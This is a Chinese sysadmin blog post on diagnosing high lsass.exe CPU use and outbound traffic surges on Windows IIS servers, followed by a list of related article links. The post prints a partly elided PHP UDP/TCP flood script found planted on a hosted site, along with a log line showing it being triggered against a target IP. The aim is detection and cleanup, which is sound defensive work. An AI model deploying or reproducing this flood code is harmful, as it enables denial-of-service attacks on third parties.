服务器lsass状态代码c0000005,Windows服务器上lsass.exe进程CPU使用率异常问题排查方法...
近期有几台服务器相继出现 lsass.exe 占用CPU过高,也不算太高,而且过了一段时间又会恢复正常,CPU过高直接造成网站打开很慢,周而反复。
在CPU跑高的时候,伴随着一个现像就是网络的浮动,有时候上传居然达到了30M - 90M/s,对外攻击,第一时间就想到有可能是这个原因,那具体怎么查呢?
常见的对外文件,这东西网上搜一下就能找到。
复制代码 代码如下:<?php
set_time_limit(86400);
ignore_user_abort(True);
$packets = 0;
$http = $_REQUEST['http'];
$rand = $_REQUEST['exit'];
$exec_time = $_REQUEST['time'];
........
echo $_REQUEST['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER['SERVER_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_REQUEST['rat'];
exit;
}
echo "Php 2012 Terminator";
exit;
}
for($i=0;$i<65535;$i++)
{
$out .= "X";
}
/........
}
$fp = fsockopen("udp://$http", $rand, $errno, $errstr, 5);
if($fp)
{
fwrite($fp, $out);
fclose($fp);
}
}
else
if($rand==500)
while(1)
{
$packets++;
if(time() > $max_time){
break;
}
$fp = pfsockopen("udp://$http", $rand, $errno, $errstr, 5);
if($fp)
{
fwrite($fp, $out);
fclose($fp);
}
}
else
while(1)
{
$packets++;
if(time() > $max_time){
break;
}
$fp = pfsockopen("tcp://$http", $rand, $errno, $errstr, 5);
if($fp)
{
fwrite($fp, $out);
fclose($fp);
}
}
?>
那要如何定位到是哪个站呢?
你可以打开日志
C:\Windows\System32\LogFiles\HTTPERR\httperr...log,打开今天时间的文件,
里面有类似这样的记录:
复制代码 代码如下:2011-04-26 06:37:28 58.255.112.112 26817 98.126.247.13 80 HTTP/1.1 GET /xxxx/xxxxxx.php?host=122.224.32.100&port=445&time=120 503 783 Disabled 30_FreeHost_1
最后三项 783 Disabled 30_FreeHost_1
783就是这个站在IIS中的ID
30_FreeHost_1就是所在池
解决办法:
找到这个站点,接下来想要解决就好办了,如果条件允许,可以直接禁用掉fsockopen这个函数,当然这个大部份情况下是不适用的。
那就去这个站点的根止录下找找吧。
复制代码 代码如下:$fp = fsockopen("udp://$http", $rand, $errno, $errstr, 5);
可以借助一些工具,查找上面这句话,或是查找$fp = fsockopen,这样其本上攻击文件就无所遁形了,当然不要删除了正常的邮件发送文件,最后重启下服务,嗯,不卡了。
服务器lsass状态代码c0000005,Windows服务器上lsass.exe进程CPU使用率异常问题排查方法...相关推荐
- Windows上erl.exe的CPU使用率很高的问题【未解决】
Windows上erl.exe的CPU使用率很高的问题[未解决] 参考文章: (1)Windows上erl.exe的CPU使用率很高的问题[未解决] (2)https://www.cnblogs.co ...
- Windows下用C语言获取进程cpu使用率,内存使用,IO情况
/** @file * @brief 进程统计信息函数的声明 * @author 张亚霏 * @date 2009/05/03 * @version 0.1 * */ #ifndef PROCESS_ ...
- c语言占用cpu的程序,Windows下用C语言获取进程cpu使用率,内存使用,IO情况
转自: http://zhangyafeikimi.iteye.com/blog/378658 process_stat.h /** @file * @brief 进程统计信息函数的声明 * @aut ...
- linux服务器 cpu使用率过高,服务器CPU使用率过高排查与解决思路
发现服务器的cpu使用率特别高 排查思路: -使用top或者mpstat查看cpu的使用情况 mpstat -P ALL 2 1 Linux 2.6.32-358.el6.x86_64 (linux- ...
- window服务器cpu过高的排查_服务器CPU使用率过高排查与解决思路
发现服务器的cpu使用率特别高 排查思路: -使用top或者mpstat查看cpu的使用情况 mpstat -P ALL 2 1 Linux 2.6.32-358.el6.x86_64 (linux- ...
- WPF学习笔记——在“System.Windows.StaticResourceExtension”上提供值时引发了异常
在"System.Windows.StaticResourceExtension"上提供值时引发了异常 因应需要,写了一个转换器,然后窗体上引用,结果就出来这个错.编译的时候没事, ...
- 线上告警CPU使用率过高排查分析
本文主要列举了如下几种可能造成CPU过高的场景进行排查分析. 1.代码死循环 启动了两个线程(线程一定要起一个合适的名称,出了问题时方便排查),一个线程空循环,一个线程每500ms循环一次. publ ...
- 关于使用WindowsUpdate 或 Windows 自动升级时碰到的 svchost.exe 进程 CPU 资源占用过高的问题的相关信息...
当你使用 WindowsUpdate 或 Windows 自动升级的时候,可能会碰到 svchost.exe 进程CPU占用100%的现象.如果你的现象符合下面的相关症状,请安装一个补丁程序用于缓解这 ...
- VS2017 启动调试出现 无法启动程序“http://localhost:15613” 操作在当前状态中是非法的。 同时附加进程也是错误的解决方法
VS2017 启动调试出现 无法启动程序"http://localhost:15613" 操作在当前状态中是非法的. 同时附加进程也是错误的解决方法 参考文章: (1)VS2017 ...
- http服务器返回状态代码含义
100 - 表示已收到请求的一部分,正在继续发送余下部分. 101 - 切换协议. 2xx - 成功.服务器成功地接受了客户端请求: 200 - 确定.客户端请求已成功. 201 - 已创建. 202 ...
最新文章
- autocad完全应用指南_建筑绘图慢?580页的AUTOCAD完全自学必备指南,高效绘图不求人...
- java IO(输入输出) 字符流
- 剑指 Offer 27. 二叉树的镜像【无取巧解法,易于理解!】
- OpenStack部署之小结
- 0010服务器无对应信息,查看云服务器信息
- Filter案例之敏感词过滤和代理模式
- 19级:班级日常分享,一天一瞬间
- 七点人脸姿态估计_Github开源库简单配置即可上线的3D人脸检测工具箱
- 清除error.log、access.log并限制Apache日志文件大小的方法
- opencv 星空_opencv如何将大于5000像素点的轮廓绘制出来?
- # SDN第五次上机作业
- 关于移动端点击事件的问题
- CentoS 下报的 Requires: perl(:MODULE_COMPAT_5.8.8)
- TypeError: create_target_machine() got an unexpected keyword argument ‘jitdebug‘解决方案
- Linux vsFTPd服务详解——文件加密传输配置
- html站点地图怎么做,如何制作网站地图,制作网站地图的步骤
- 苹果手机以旧换新价格表_苹果支持安卓手机以旧换新;索尼公司将更名;百度网盘推出“防误删”文件恢复服务...
- python-opencv 帧差法目标检测
- linux测速,linux环境下使用speedtest测速
- C++调用ffmpeg批量合并bilibili缓存视频 2.0